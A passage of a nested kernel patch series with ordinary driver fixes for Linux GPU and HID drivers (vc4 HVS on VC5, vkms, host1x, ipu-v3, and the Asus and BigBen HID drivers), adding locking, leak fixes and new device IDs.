+ 					  SCALER_DISPCTRLX_WIDTH) |
+ 			    VC4_SET_FIELD(mode->vdisplay,
+ 					  SCALER_DISPCTRLX_HEIGHT) |
+ 			    (oneshot ? SCALER_DISPCTRLX_ONESHOT : 0);
+-	else
++		dispbkgndx |= SCALER_DISPBKGND_AUTOHS;
++	} else {
+ 		dispctrl |= VC4_SET_FIELD(mode->hdisplay,
+ 					  SCALER5_DISPCTRLX_WIDTH) |
+ 			    VC4_SET_FIELD(mode->vdisplay,
+ 					  SCALER5_DISPCTRLX_HEIGHT) |
+ 			    (oneshot ? SCALER5_DISPCTRLX_ONESHOT : 0);
++		dispbkgndx &= ~SCALER5_DISPBKGND_BCK2BCK;
++	}
+ 
+ 	HVS_WRITE(SCALER_DISPCTRLX(chan), dispctrl);
+ 
+-	dispbkgndx = HVS_READ(SCALER_DISPBKGNDX(chan));
+ 	dispbkgndx &= ~SCALER_DISPBKGND_GAMMA;
+ 	dispbkgndx &= ~SCALER_DISPBKGND_INTERLACE;
+ 
+ 	HVS_WRITE(SCALER_DISPBKGNDX(chan), dispbkgndx |
+-		  SCALER_DISPBKGND_AUTOHS |
+ 		  ((!vc4->is_vc5) ? SCALER_DISPBKGND_GAMMA : 0) |
+ 		  (interlace ? SCALER_DISPBKGND_INTERLACE : 0));
+ 
+@@ -656,7 +658,8 @@ void vc4_hvs_mask_underrun(struct vc4_hvs *hvs, int channel)
+ 		return;
+ 
+ 	dispctrl = HVS_READ(SCALER_DISPCTRL);
+-	dispctrl &= ~SCALER_DISPCTRL_DSPEISLUR(channel);
++	dispctrl &= ~(hvs->vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					 SCALER_DISPCTRL_DSPEISLUR(channel));
+ 
+ 	HVS_WRITE(SCALER_DISPCTRL, dispctrl);
+ 
+@@ -673,7 +676,8 @@ void vc4_hvs_unmask_underrun(struct vc4_hvs *hvs, int channel)
+ 		return;
+ 
+ 	dispctrl = HVS_READ(SCALER_DISPCTRL);
+-	dispctrl |= SCALER_DISPCTRL_DSPEISLUR(channel);
++	dispctrl |= (hvs->vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					SCALER_DISPCTRL_DSPEISLUR(channel));
+ 
+ 	HVS_WRITE(SCALER_DISPSTAT,
+ 		  SCALER_DISPSTAT_EUFLOW(channel));
+@@ -699,6 +703,7 @@ static irqreturn_t vc4_hvs_irq_handler(int irq, void *data)
+ 	int channel;
+ 	u32 control;
+ 	u32 status;
++	u32 dspeislur;
+ 
+ 	/*
+ 	 * NOTE: We don't need to protect the register access using
+@@ -715,9 +720,11 @@ static irqreturn_t vc4_hvs_irq_handler(int irq, void *data)
+ 	control = HVS_READ(SCALER_DISPCTRL);
+ 
+ 	for (channel = 0; channel < SCALER_CHANNELS_COUNT; channel++) {
++		dspeislur = vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					  SCALER_DISPCTRL_DSPEISLUR(channel);
+ 		/* Interrupt masking is not always honored, so check it here. */
+ 		if (status & SCALER_DISPSTAT_EUFLOW(channel) &&
+-		    control & SCALER_DISPCTRL_DSPEISLUR(channel)) {
++		    control & dspeislur) {
+ 			vc4_hvs_mask_underrun(hvs, channel);
+ 			vc4_hvs_report_underrun(dev);
+ 
+@@ -870,19 +877,45 @@ static int vc4_hvs_bind(struct device *dev, struct device *master, void *data)
+ 		    SCALER_DISPCTRL_DISPEIRQ(1) |
+ 		    SCALER_DISPCTRL_DISPEIRQ(2);
+ 
+-	dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
+-		      SCALER_DISPCTRL_SLVWREIRQ |
+-		      SCALER_DISPCTRL_SLVRDEIRQ |
+-		      SCALER_DISPCTRL_DSPEIEOF(0) |
+-		      SCALER_DISPCTRL_DSPEIEOF(1) |
+-		      SCALER_DISPCTRL_DSPEIEOF(2) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(0) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(1) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(2) |
+-		      SCALER_DISPCTRL_DSPEISLUR(0) |
+-		      SCALER_DISPCTRL_DSPEISLUR(1) |
+-		      SCALER_DISPCTRL_DSPEISLUR(2) |
+-		      SCALER_DISPCTRL_SCLEIRQ);
++	if (!vc4->is_vc5)
++		dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
++			      SCALER_DISPCTRL_SLVWREIRQ |
++			      SCALER_DISPCTRL_SLVRDEIRQ |
++			      SCALER_DISPCTRL_DSPEIEOF(0) |
++			      SCALER_DISPCTRL_DSPEIEOF(1) |
++			      SCALER_DISPCTRL_DSPEIEOF(2) |
++			      SCALER_DISPCTRL_DSPEIEOLN(0) |
++			      SCALER_DISPCTRL_DSPEIEOLN(1) |
++			      SCALER_DISPCTRL_DSPEIEOLN(2) |
++			      SCALER_DISPCTRL_DSPEISLUR(0) |
++			      SCALER_DISPCTRL_DSPEISLUR(1) |
++			      SCALER_DISPCTRL_DSPEISLUR(2) |
++			      SCALER_DISPCTRL_SCLEIRQ);
++	else
++		dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
++			      SCALER5_DISPCTRL_SLVEIRQ |
++			      SCALER5_DISPCTRL_DSPEIEOF(0) |
++			      SCALER5_DISPCTRL_DSPEIEOF(1) |
++			      SCALER5_DISPCTRL_DSPEIEOF(2) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(0) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(1) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(2) |
++			      SCALER5_DISPCTRL_DSPEISLUR(0) |
++			      SCALER5_DISPCTRL_DSPEISLUR(1) |
++			      SCALER5_DISPCTRL_DSPEISLUR(2) |
++			      SCALER_DISPCTRL_SCLEIRQ);
++
++
++	/* Set AXI panic mode.
++	 * VC4 panics when < 2 lines in FIFO.
++	 * VC5 panics when less than 1 line in the FIFO.
++	 */
++	dispctrl &= ~(SCALER_DISPCTRL_PANIC0_MASK |
++		      SCALER_DISPCTRL_PANIC1_MASK |
++		      SCALER_DISPCTRL_PANIC2_MASK);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC0);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC1);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC2);
+ 
+ 	HVS_WRITE(SCALER_DISPCTRL, dispctrl);
+ 
+diff --git a/drivers/gpu/drm/vc4/vc4_plane.c b/drivers/gpu/drm/vc4/vc4_plane.c
+index bd5acc4a86876..eb08020154f30 100644
+--- a/drivers/gpu/drm/vc4/vc4_plane.c
++++ b/drivers/gpu/drm/vc4/vc4_plane.c
+@@ -75,11 +75,13 @@ static const struct hvs_format {
+ 		.drm = DRM_FORMAT_ARGB1555,
+ 		.hvs = HVS_PIXEL_FORMAT_RGBA5551,
+ 		.pixel_order = HVS_PIXEL_ORDER_ABGR,
++		.pixel_order_hvs5 = HVS_PIXEL_ORDER_ARGB,
+ 	},
+ 	{
+ 		.drm = DRM_FORMAT_XRGB1555,
+ 		.hvs = HVS_PIXEL_FORMAT_RGBA5551,
+ 		.pixel_order = HVS_PIXEL_ORDER_ABGR,
++		.pixel_order_hvs5 = HVS_PIXEL_ORDER_ARGB,
+ 	},
+ 	{
+ 		.drm = DRM_FORMAT_RGB888,
+diff --git a/drivers/gpu/drm/vc4/vc4_regs.h b/drivers/gpu/drm/vc4/vc4_regs.h
+index f0290fad991de..1256f0877ff66 100644
+--- a/drivers/gpu/drm/vc4/vc4_regs.h
++++ b/drivers/gpu/drm/vc4/vc4_regs.h
+@@ -220,6 +220,12 @@
+ #define SCALER_DISPCTRL                         0x00000000
+ /* Global register for clock gating the HVS */
+ # define SCALER_DISPCTRL_ENABLE			BIT(31)
++# define SCALER_DISPCTRL_PANIC0_MASK		VC4_MASK(25, 24)
++# define SCALER_DISPCTRL_PANIC0_SHIFT		24
++# define SCALER_DISPCTRL_PANIC1_MASK		VC4_MASK(27, 26)
++# define SCALER_DISPCTRL_PANIC1_SHIFT		26
++# define SCALER_DISPCTRL_PANIC2_MASK		VC4_MASK(29, 28)
++# define SCALER_DISPCTRL_PANIC2_SHIFT		28
+ # define SCALER_DISPCTRL_DSP3_MUX_MASK		VC4_MASK(19, 18)
+ # define SCALER_DISPCTRL_DSP3_MUX_SHIFT		18
+ 
+@@ -228,15 +234,21 @@
+  * always enabled.
+  */
+ # define SCALER_DISPCTRL_DSPEISLUR(x)		BIT(13 + (x))
++# define SCALER5_DISPCTRL_DSPEISLUR(x)		BIT(9 + ((x) * 4))
+ /* Enables Display 0 end-of-line-N contribution to
+  * SCALER_DISPSTAT_IRQDISP0
+  */
+ # define SCALER_DISPCTRL_DSPEIEOLN(x)		BIT(8 + ((x) * 2))
++# define SCALER5_DISPCTRL_DSPEIEOLN(x)		BIT(8 + ((x) * 4))
+ /* Enables Display 0 EOF contribution to SCALER_DISPSTAT_IRQDISP0 */
+ # define SCALER_DISPCTRL_DSPEIEOF(x)		BIT(7 + ((x) * 2))
++# define SCALER5_DISPCTRL_DSPEIEOF(x)		BIT(7 + ((x) * 4))
+ 
+-# define SCALER_DISPCTRL_SLVRDEIRQ		BIT(6)
+-# define SCALER_DISPCTRL_SLVWREIRQ		BIT(5)
++# define SCALER5_DISPCTRL_DSPEIVST(x)		BIT(6 + ((x) * 4))
++
++# define SCALER_DISPCTRL_SLVRDEIRQ		BIT(6)	/* HVS4 only */
++# define SCALER_DISPCTRL_SLVWREIRQ		BIT(5)	/* HVS4 only */
++# define SCALER5_DISPCTRL_SLVEIRQ		BIT(5)
+ # define SCALER_DISPCTRL_DMAEIRQ		BIT(4)
+ /* Enables interrupt generation on the enabled EOF/EOLN/EISLUR
+  * bits and short frames..
+@@ -360,6 +372,7 @@
+ 
+ #define SCALER_DISPBKGND0                       0x00000044
+ # define SCALER_DISPBKGND_AUTOHS		BIT(31)
++# define SCALER5_DISPBKGND_BCK2BCK		BIT(31)
+ # define SCALER_DISPBKGND_INTERLACE		BIT(30)
+ # define SCALER_DISPBKGND_GAMMA			BIT(29)
+ # define SCALER_DISPBKGND_TESTMODE_MASK		VC4_MASK(28, 25)
+diff --git a/drivers/gpu/drm/vkms/vkms_drv.c b/drivers/gpu/drm/vkms/vkms_drv.c
+index 0ffe5f0e33f75..f716c5796f5fc 100644
+--- a/drivers/gpu/drm/vkms/vkms_drv.c
++++ b/drivers/gpu/drm/vkms/vkms_drv.c
+@@ -57,7 +57,8 @@ static void vkms_release(struct drm_device *dev)
+ {
+ 	struct vkms_device *vkms = drm_device_to_vkms_device(dev);
+ 
+-	destroy_workqueue(vkms->output.composer_workq);
++	if (vkms->output.composer_workq)
++		destroy_workqueue(vkms->output.composer_workq);
+ }
+ 
+ static void vkms_atomic_commit_tail(struct drm_atomic_state *old_state)
+@@ -218,6 +219,7 @@ out_unregister:
+ 
+ static int __init vkms_init(void)
+ {
++	int ret;
+ 	struct vkms_config *config;
+ 
+ 	config = kmalloc(sizeof(*config), GFP_KERNEL);
+@@ -230,7 +232,11 @@ static int __init vkms_init(void)
+ 	config->writeback = enable_writeback;
+ 	config->overlay = enable_overlay;
+ 
+-	return vkms_create(config);
++	ret = vkms_create(config);
++	if (ret)
++		kfree(config);
++
++	return ret;
+ }
+ 
+ static void vkms_destroy(struct vkms_config *config)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x06_uclass.h b/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
+index 5f831438d19bb..50c32de452fb1 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x07_uclass.h b/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
+index 8cd2ef087d5d0..887b878f92f79 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x08_uclass.h b/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
+index 724cccd71aa1a..4fb1d090edae5 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/syncpt_hw.c b/drivers/gpu/host1x/hw/syncpt_hw.c
+index dd39d67ccec36..8cf35b2eff3db 100644
+--- a/drivers/gpu/host1x/hw/syncpt_hw.c
++++ b/drivers/gpu/host1x/hw/syncpt_hw.c
+@@ -106,9 +106,6 @@ static void syncpt_assign_to_channel(struct host1x_syncpt *sp,
+ #if HOST1X_HW >= 6
+ 	struct host1x *host = sp->host;
+ 
+-	if (!host->hv_regs)
+-		return;
+-
+ 	host1x_sync_writel(host,
+ 			   HOST1X_SYNC_SYNCPT_CH_APP_CH(ch ? ch->id : 0xff),
+ 			   HOST1X_SYNC_SYNCPT_CH_APP(sp->id));
+diff --git a/drivers/gpu/ipu-v3/ipu-common.c b/drivers/gpu/ipu-v3/ipu-common.c
+index 118318513e2d2..c35eac1116f5f 100644
+--- a/drivers/gpu/ipu-v3/ipu-common.c
++++ b/drivers/gpu/ipu-v3/ipu-common.c
+@@ -1165,6 +1165,7 @@ static int ipu_add_client_devices(struct ipu_soc *ipu, unsigned long ipu_base)
+ 		pdev = platform_device_alloc(reg->name, id++);
+ 		if (!pdev) {
+ 			ret = -ENOMEM;
++			of_node_put(of_node);
+ 			goto err_register;
+ 		}
+ 
+diff --git a/drivers/hid/hid-asus.c b/drivers/hid/hid-asus.c
+index f99752b998f3d..d1094bb1aa429 100644
+--- a/drivers/hid/hid-asus.c
++++ b/drivers/hid/hid-asus.c
+@@ -98,6 +98,7 @@ struct asus_kbd_leds {
+ 	struct hid_device *hdev;
+ 	struct work_struct work;
+ 	unsigned int brightness;
++	spinlock_t lock;
+ 	bool removed;
+ };
+ 
+@@ -490,21 +491,42 @@ static int rog_nkey_led_init(struct hid_device *hdev)
+ 	return ret;
+ }
+ 
++static void asus_schedule_work(struct asus_kbd_leds *led)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
++	if (!led->removed)
++		schedule_work(&led->work);
++	spin_unlock_irqrestore(&led->lock, flags);
++}
++
+ static void asus_kbd_backlight_set(struct led_classdev *led_cdev,
+ 				   enum led_brightness brightness)
+ {
+ 	struct asus_kbd_leds *led = container_of(led_cdev, struct asus_kbd_leds,
+ 						 cdev);
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
+ 	led->brightness = brightness;
+-	schedule_work(&led->work);
++	spin_unlock_irqrestore(&led->lock, flags);
++
++	asus_schedule_work(led);
+ }
+ 
+ static enum led_brightness asus_kbd_backlight_get(struct led_classdev *led_cdev)
+ {
+ 	struct asus_kbd_leds *led = container_of(led_cdev, struct asus_kbd_leds,
+ 						 cdev);
++	enum led_brightness brightness;
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
++	brightness = led->brightness;
++	spin_unlock_irqrestore(&led->lock, flags);
+ 
+-	return led->brightness;
++	return brightness;
+ }
+ 
+ static void asus_kbd_backlight_work(struct work_struct *work)
+@@ -512,11 +534,11 @@ static void asus_kbd_backlight_work(struct work_struct *work)
+ 	struct asus_kbd_leds *led = container_of(work, struct asus_kbd_leds, work);
+ 	u8 buf[] = { FEATURE_KBD_REPORT_ID, 0xba, 0xc5, 0xc4, 0x00 };
+ 	int ret;
++	unsigned long flags;
+ 
+-	if (led->removed)
+-		return;
+-
++	spin_lock_irqsave(&led->lock, flags);
+ 	buf[4] = led->brightness;
++	spin_unlock_irqrestore(&led->lock, flags);
+ 
+ 	ret = asus_kbd_set_report(led->hdev, buf, sizeof(buf));
+ 	if (ret < 0)
+@@ -584,6 +606,7 @@ static int asus_kbd_register_leds(struct hid_device *hdev)
+ 	drvdata->kbd_backlight->cdev.brightness_set = asus_kbd_backlight_set;
+ 	drvdata->kbd_backlight->cdev.brightness_get = asus_kbd_backlight_get;
+ 	INIT_WORK(&drvdata->kbd_backlight->work, asus_kbd_backlight_work);
++	spin_lock_init(&drvdata->kbd_backlight->lock);
+ 
+ 	ret = devm_led_classdev_register(&hdev->dev, &drvdata->kbd_backlight->cdev);
+ 	if (ret < 0) {
+@@ -1119,9 +1142,13 @@ err_stop_hw:
+ static void asus_remove(struct hid_device *hdev)
+ {
+ 	struct asus_drvdata *drvdata = hid_get_drvdata(hdev);
++	unsigned long flags;
+ 
+ 	if (drvdata->kbd_backlight) {
++		spin_lock_irqsave(&drvdata->kbd_backlight->lock, flags);
+ 		drvdata->kbd_backlight->removed = true;
++		spin_unlock_irqrestore(&drvdata->kbd_backlight->lock, flags);
++
+ 		cancel_work_sync(&drvdata->kbd_backlight->work);
+ 	}
+ 
+diff --git a/drivers/hid/hid-bigbenff.c b/drivers/hid/hid-bigbenff.c
+index e8b16665860d6..a02cb517b4c47 100644
+--- a/drivers/hid/hid-bigbenff.c
++++ b/drivers/hid/hid-bigbenff.c
+@@ -174,6 +174,7 @@ static __u8 pid0902_rdesc_fixed[] = {
+ struct bigben_device {
+ 	struct hid_device *hid;
+ 	struct hid_report *report;
++	spinlock_t lock;
+ 	bool removed;
+ 	u8 led_state;         /* LED1 = 1 .. LED4 = 8 */
+ 	u8 right_motor_on;    /* right motor off/on 0/1 */
+@@ -184,18 +185,39 @@ struct bigben_device {
+ 	struct work_struct worker;
+ };
+ 
++static inline void bigben_schedule_work(struct bigben_device *bigben)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&bigben->lock, flags);
++	if (!bigben->removed)
++		schedule_work(&bigben->worker);
++	spin_unlock_irqrestore(&bigben->lock, flags);
++}
+ 
+ static void bigben_worker(struct work_struct *work)
+ {
+ 	struct bigben_device *bigben = container_of(work,
+ 		struct bigben_device, worker);
+ 	struct hid_field *report_field = bigben->report->field[0];
+-
+-	if (bigben->removed || !report_field)
++	bool do_work_led = false;
++	bool do_work_ff = false;
++	u8 *buf;
++	u32 len;
++	unsigned long flags;
++
++	buf = hid_alloc_report_buf(bigben->report, GFP_KERNEL);
++	if (!buf)
+ 		return;
+ 
++	len = hid_report_len(bigben->report);
++
++	/* LED work */
++	spin_lock_irqsave(&bigben->lock, flags);
++
+ 	if (bigben->work_led) {
+ 		bigben->work_led = false;
++		do_work_led = true;
+ 		report_field->value[0] = 0x01; /* 1 = led message */
+ 		report_field->value[1] = 0x08; /* reserved value, always 8 */
+ 		report_field->value[2] = bigben->led_state;
+@@ -204,11 +226,22 @@ static void bigben_worker(struct work_struct *work)
+ 		report_field->value[5] = 0x00; /* padding */
+ 		report_field->value[6] = 0x00; /* padding */
+ 		report_field->value[7] = 0x00; /* padding */
+-		hid_hw_request(bigben->hid, bigben->report, HID_REQ_SET_REPORT);
++		hid_output_report(bigben->report, buf);
++	}
++
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
++	if (do_work_led) {
++		hid_hw_raw_request(bigben->hid, bigben->report->id, buf, len,
++				   bigben->report->type, HID_REQ_SET_REPORT);
+ 	}
+ 
++	/* FF work */
++	spin_lock_irqsave(&bigben->lock, flags);
++
+ 	if (bigben->work_ff) {
+ 		bigben->work_ff = false;
++		do_work_ff = true;
+ 		report_field->value[0] = 0x02; /* 2 = rumble effect message */
+ 		report_field->value[1] = 0x08; /* reserved value, always 8 */
+ 		report_field->value[2] = bigben->right_motor_on;
+@@ -217,8 +250,17 @@ static void bigben_worker(struct work_struct *work)
+ 		report_field->value[5] = 0x00; /* padding */
+ 		report_field->value[6] = 0x00; /* padding */
+ 		report_field->value[7] = 0x00; /* padding */
+-		hid_hw_request(bigben->hid, bigben->report, HID_REQ_SET_REPORT);
++		hid_output_report(bigben->report, buf);
++	}
++
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
++	if (do_work_ff) {
++		hid_hw_raw_request(bigben->hid, bigben->report->id, buf, len,
++				   bigben->report->type, HID_REQ_SET_REPORT);
+ 	}
++
++	kfree(buf);
+ }
+ 
+ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+@@ -228,6 +270,7 @@ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
+ 	u8 right_motor_on;
+ 	u8 left_motor_force;
++	unsigned long flags;
+ 
+ 	if (!bigben) {
+ 		hid_err(hid, "no device data\n");
+@@ -242,10 +285,13 @@ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+ 
+ 	if (right_motor_on != bigben->right_motor_on ||
+ 			left_motor_force != bigben->left_motor_force) {
++		spin_lock_irqsave(&bigben->lock, flags);
+ 		bigben->right_motor_on   = right_motor_on;
+ 		bigben->left_motor_force = left_motor_force;
+ 		bigben->work_ff = true;
+-		schedule_work(&bigben->worker);
++		spin_unlock_irqrestore(&bigben->lock, flags);
++
++		bigben_schedule_work(bigben);
+ 	}
+ 
+ 	return 0;
+@@ -259,6 +305,7 @@ static void bigben_set_led(struct led_classdev *led,
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
+ 	int n;
+ 	bool work;
++	unsigned long flags;
+ 
+ 	if (!bigben) {
+ 		hid_err(hid, "no device data\n");
+@@ -267,6 +314,7 @@ static void bigben_set_led(struct led_classdev *led,
+ 
+ 	for (n = 0; n < NUM_LEDS; n++) {
+ 		if (led == bigben->leds[n]) {
++			spin_lock_irqsave(&bigben->lock, flags);
+ 			if (value == LED_OFF) {
+ 				work = (bigben->led_state & BIT(n));
+ 				bigben->led_state &= ~BIT(n);
+@@ -274,10 +322,11 @@ static void bigben_set_led(struct led_classdev *led,
+ 				work = !(bigben->led_state & BIT(n));
+ 				bigben->led_state |= BIT(n);
+ 			}
++			spin_unlock_irqrestore(&bigben->lock, flags);
+ 
+ 			if (work) {
+ 				bigben->work_led = true;
+-				schedule_work(&bigben->worker);
++				bigben_schedule_work(bigben);
+ 			}
+ 			return;
+ 		}
+@@ -307,8 +356,12 @@ static enum led_brightness bigben_get_led(struct led_classdev *led)
+ static void bigben_remove(struct hid_device *hid)
+ {
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&bigben->lock, flags);
+ 	bigben->removed = true;
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
+ 	cancel_work_sync(&bigben->worker);
+ 	hid_hw_stop(hid);
+ }
+@@ -318,7 +371,6 @@ static int bigben_probe(struct hid_device *hid,
+ {
+ 	struct bigben_device *bigben;
+ 	struct hid_input *hidinput;
+-	struct list_head *report_list;
+ 	struct led_classdev *led;
+ 	char *name;
+ 	size_t name_sz;
+@@ -343,14 +395,12 @@ static int bigben_probe(struct hid_device *hid,
+ 		return error;
+ 	}
+ 
+-	report_list = &hid->report_enum[HID_OUTPUT_REPORT].report_list;
+-	if (list_empty(report_list)) {
++	bigben->report = hid_validate_values(hid, HID_OUTPUT_REPORT, 0, 0, 8);
++	if (!bigben->report) {
+ 		hid_err(hid, "no output report found\n");
+ 		error = -ENODEV;
+ 		goto error_hw_stop;
+ 	}
+-	bigben->report = list_entry(report_list->next,
+-		struct hid_report, list);
+ 
+ 	if (list_empty(&hid->inputs)) {
+ 		hid_err(hid, "no inputs found\n");
+@@ -362,6 +412,7 @@ static int bigben_probe(struct hid_device *hid,
+ 	set_bit(FF_RUMBLE, hidinput->input->ffbit);
+ 
+ 	INIT_WORK(&bigben->worker, bigben_worker);
++	spin_lock_init(&bigben->lock);
+ 
+ 	error = input_ff_create_memless(hidinput->input, NULL,
+ 		hid_bigben_play_effect);
+@@ -402,7 +453,7 @@ static int bigben_probe(struct hid_device *hid,
+ 	bigben->left_motor_force = 0;
+ 	bigben->work_led = true;
+ 	bigben->work_ff = true;
+-	schedule_work(&bigben->worker);
++	bigben_schedule_work(bigben);
+ 
+ 	hid_info(hid, "LED and force feedback support for BigBen gamepad\n");
+ 
+diff --git a/drivers/hid/hid-debug.c b/drivers/hid/hid-debug.c
+index 2ca6ab600bc9f..15e35702773cd 100644
+--- a/drivers/hid/hid-debug.c
++++ b/drivers/hid/hid-debug.c
+@@ -972,6 +972,7 @@ static const char *keys[KEY_MAX + 1] = {
+ 	[KEY_KBD_LAYOUT_NEXT] = "KbdLayoutNext",
+ 	[KEY_EMOJI_PICKER] = "EmojiPicker",
+ 	[KEY_DICTATE] = "Dictate",
++	[KEY_MICMUTE] = "MicrophoneMute",
+ 	[KEY_BRIGHTNESS_MIN] = "BrightnessMin",
+ 	[KEY_BRIGHTNESS_MAX] = "BrightnessMax",
+ 	[KEY_BRIGHTNESS_AUTO] = "BrightnessAuto",
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 9e36b4cd905ee..2235d78784b1b 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -1299,7 +1299,9 @@
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01	0x0042
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2	0x0905
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L	0x0935
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW	0x0934
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S	0x0909
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW	0x0933
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06	0x0078
+ #define USB_DEVICE_ID_UGEE_TABLET_G5		0x0074
+ #define USB_DEVICE_ID_UGEE_TABLET_EX07S		0x0071
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 7e94ca1822afb..c3f80b516f398 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -378,6 +378,10 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L),
+ 	  HID_BATTERY_QUIRK_AVOID_QUERY },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100),
+@@ -793,6 +797,14 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 			break;
+ 		}
+ 
++		if ((usage->hid & 0xf0) == 0xa0) {	/* SystemControl */
++			switch (usage->hid & 0xf) {
++			case 0x9: map_key_clear(KEY_MICMUTE); break;
++			default: goto ignore;
++			}
++			break;
++		}
++
+ 		if ((usage->hid & 0xf0) == 0xb0) {	/* SC - Display */
+ 			switch (usage->hid & 0xf) {
+ 			case 0x05: map_key_clear(KEY_SWITCHVIDEOMODE); break;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 07b8506eecc41..fdb66dc065822 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -77,6 +77,7 @@ MODULE_PARM_DESC(disable_tap_to_click,
+ #define HIDPP_QUIRK_HIDPP_WHEELS		BIT(26)
+ #define HIDPP_QUIRK_HIDPP_EXTRA_MOUSE_BTNS	BIT(27)
+ #define HIDPP_QUIRK_HIDPP_CONSUMER_VENDOR_KEYS	BIT(28)
++#define HIDPP_QUIRK_HI_RES_SCROLL_1P0		BIT(29)
+ 
+ /* These are just aliases for now */
+ #define HIDPP_QUIRK_KBD_SCROLL_WHEEL HIDPP_QUIRK_HIDPP_WHEELS
+@@ -3472,14 +3473,8 @@ static int hidpp_initialize_hires_scroll(struct hidpp_device *hidpp)
